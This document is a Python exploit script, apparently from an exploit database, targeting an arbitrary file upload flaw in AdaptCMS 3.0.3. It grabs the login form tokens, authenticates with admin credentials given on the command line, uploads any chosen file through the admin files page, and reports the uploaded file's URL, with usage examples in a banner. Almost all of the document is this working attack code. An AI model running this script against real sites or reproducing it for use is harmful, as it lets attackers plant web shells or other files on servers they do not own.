Adapt CMS 3.0.3 File Upload

`  
#!usr/bin/python  
"""  
| Exploit Title: Adapt Cms Arbitrary File Upload  
|  
| Exploit Author: Ashiyane Digital Security Team   
|  
| Vendor Homepage: http://www.adaptcms.com/  
|  
| Download Link : http://www.adaptcms.com/downloads/latest_adaptcms.zip  
|  
| Tested Version : AdaptCMS 3.0.3  
|  
| Tested on: Windows 7 / Mozilla Firefox  
|  
| Date: 2017-01-22  
"""  
import requests,os,sys  
from bs4 import BeautifulSoup  
error=""  
def banner_print(error):  
banner="""  
_______________________________________________________________________________________  
_ _ _____ _ _ _ _   
/\ | | (_) | __ \(_) (_) | | |   
/ \ ___| |__ _ _ _ __ _ _ __ ___ | | | |_ __ _ _| |_ __ _| |   
/ /\ \ / __| '_ \| | | | |/ _` | '_ \ / _ \ | | | | |/ _` | | __/ _` | |   
/ ____ \\__ \ | | | | |_| | (_| | | | | __/ | |__| | | (_| | | || (_| | |   
/_/ \_\___/_| |_|_|\__, |\__,_|_| |_|\___| |_____/|_|\__, |_|\__\__,_|_|   
__/ | __/ |   
|___/ |___/   
_____ _ _ _______   
/ ____| (_) | |__ __|   
| (___ ___ ___ _ _ _ __ _| |_ _ _ | | ___ __ _ _ __ ___   
\___ \ / _ \/ __| | | | '__| | __| | | | | |/ _ \/ _` | '_ ` _ \   
____) | __/ (__| |_| | | | | |_| |_| | | | __/ (_| | | | | | |   
|_____/ \___|\___|\__,_|_| |_|\__|\__, | |_|\___|\__,_|_| |_| |_|   
__/ |   
|___/   
  
\ / _._|_ _ _| |_ /\ _ _ . _ _ |_ _|_   
\/\/ | | | (/_(_| |_)\/ /~~\| | ||| .(_|| | |   
/ _| |   
____________________________________________________________________________________   
  
\t%s  
\t Usage : python exploit.py site username_of_admin password_of_admin  
\t example : python exploit.py http://example.com admin 12345  
"""%(error)  
print banner  
banner_print(error)  
http=requests.session()  
class adapt_exploit:  
def __init__(self,url,user,passwd,file):  
self.url=url  
self.user=user  
self.passwd=passwd  
self.file=file  
def login(self):  
req=http.get(url+'/login')  
soup=BeautifulSoup(req.content,"html.parser")  
token1=soup.find_all('input',{'type':'hidden','name':'data[_Token][key]'})[0].get('value')  
token2=soup.find_all('input',{'type':'hidden','name':'data[_Token][fields]'})[1].get('value')  
print '\n[+] The token for login was received successfully.\n'  
data={'_method':'POST',  
'data[_Token][key]':token1,  
'data[User][username]':self.user,  
'data[User][password]':self.passwd,  
'data[_Token][fields]':token2}  
req=http.post(url+'/login',data=data)  
if 'success' in req.content.lower():  
print '[+] Login success\n'  
else:  
print '[!] Login Failed\n'  
exit()  
def upload(self):  
req=http.get(url+'/admin/files/add')  
soup=BeautifulSoup(req.content,"html.parser")  
token1=soup.find('input',{'type':'hidden','name':'data[_Token][key]'}).get('value')  
token2=soup.find('input',{'type':'hidden','name':'data[_Token][fields]'}).get('value')  
print '[+] The token for login was received successfully.\n'  
path=raw_input('Please enter path file that you want upload ...\n')  
path=path.replace('"','')  
path=path.replace('\'','')  
f=open(path,'rb')  
file= {'data[File][filename]' : f}  
data={'_method':'POST',  
'data[_Token][key]':token1,  
'data[_Token][fields]':token2,  
'data[File][type]':'upload',  
'data[File][0][random_filename]':'0'  
}  
req=http.post(url+'/admin/files/add',data=data,files=file)  
check=http.get('%s/uploads/'%(url))  
file_name=os.path.basename(f.name).replace(' ','_')  
if file_name in check.content:  
print "[+] File upload was successful\n"  
print "URL Of File : %s/upload/%s"%(url,file_name)  
else:  
print "\n[-] Failed to upload file "  
try :  
url=sys.argv[1]  
user=sys.argv[2]  
passwd=sys.argv[3]  
expl=adapt_exploit(url,user,passwd,file)  
expl.login()  
expl.upload()  
except IndexError as e:  
if 'nt' in os.name :  
os.system('cls')  
else:  
os.system('clear')  
error="Invalid Usage !"  
banner_print(error)  
except Exception as e:  
print "oops !!!\n Some Thing is Wrong :(( "  
print str(e)  
`